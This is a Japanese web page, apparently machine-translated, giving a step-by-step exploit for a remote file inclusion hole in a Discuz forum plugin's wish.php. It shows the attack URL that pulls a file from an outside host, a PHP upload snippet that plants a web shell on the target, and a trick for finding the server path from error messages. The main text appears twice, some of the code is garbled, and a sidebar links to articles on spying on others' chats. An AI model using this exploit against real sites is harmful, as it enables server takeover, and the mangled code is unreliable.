Wish poolプラグインリモートコンテナの脆弱性
2022-01-02 21:21:21
wish pool プラグインの wish.php ファイルに問題があります。
require $discuz_root.'. /include/discuzcode.func.php' とします。
手動による活用方法。
リモートインクルードの脆弱性、変数 discuz_root が厳密にフィルタリングされていない、エクスプロイトの方法。
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
txtのサフィックスである必要はなく、任意のサフィックスに変更することができます。常にその後にクエスチョンマークを追加することを忘れないでください。
ここでxxxx.txtは、CNからそのポニーでシェルを書き込んでください。
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub_vhosts﹑bbsguizai.php");? >
ENCTYPE="multipart/form-data" ACTION="" METHOD="POST" >.Form。
<INPUT NAME="MyFile" TYPE="ファイル">
<input VALUE=" submit " TYPE="submit">
</form>
サイトへの物理的なパスは、http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt を送信し、エラーメッセージを見てから xxxx.txt のパスを修正することで確認できます。guizai.php はアップロードしたシェルの名前です。
require $discuz_root.'. /include/discuzcode.func.php' とします。
手動による活用方法。
リモートインクルードの脆弱性、変数 discuz_root が厳密にフィルタリングされていない、エクスプロイトの方法。
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
txtのサフィックスである必要はなく、任意のサフィックスに変更することができます。常にその後にクエスチョンマークを追加することを忘れないでください。
ここでxxxx.txtは、CNからそのポニーでシェルを書き込んでください。
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub_vhosts﹑bbsguizai.php");? >
ENCTYPE="multipart/form-data" ACTION="" METHOD="POST" >.Form。
<INPUT NAME="MyFile" TYPE="ファイル">
<input VALUE=" submit " TYPE="submit">
</form>
サイトへの物理的なパスは、http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt を送信し、エラーメッセージを見てから xxxx.txt のパスを修正することで確認できます。guizai.php はアップロードしたシェルの名前です。
関連
-
よくあるウェブ攻撃について解説
-
他人のQQチャット記録を確認する方法を調べる方法 QQチャット記録を確認する詳細な方法?
-
QQは、履歴を削除する方法簡単な方法を復元するためにチャット
-
SA サンドボックスモードで xp_cmdshell と xplog70.dll をリストアせずにコマンドを実行する。
-
ASP、PHP、.NETのHTTP-REFERERの偽造方法と偽造REFERERを防止するための方法
-
WebサイトにおけるInvisible Bomb eWebEditorのファイルアップロードの脆弱性に対するパッチについて
-
PHPSHELLがまた新しくなりました
-
Macでmitmproxyを使ってHTTPSのデータを取得する方法
-
Sql2005インジェクションアシストスクリプト[修正版]について
-
Dでよく使われるインジェクションコマンドをいくつかまとめてみました。
最新
-
nginxです。[emerg] 0.0.0.0:80 への bind() に失敗しました (98: アドレスは既に使用中です)
-
htmlページでギリシャ文字を使うには
-
ピュアhtml+cssでの要素読み込み効果
-
純粋なhtml + cssで五輪を実現するサンプルコード
-
ナビゲーションバー・ドロップダウンメニューのHTML+CSSサンプルコード
-
タイピング効果を実現するピュアhtml+css
-
htmlの選択ボックスのプレースホルダー作成に関する質問
-
html css3 伸縮しない 画像表示効果
-
トップナビゲーションバーメニュー作成用HTML+CSS
-
html+css 実装 サイバーパンク風ボタン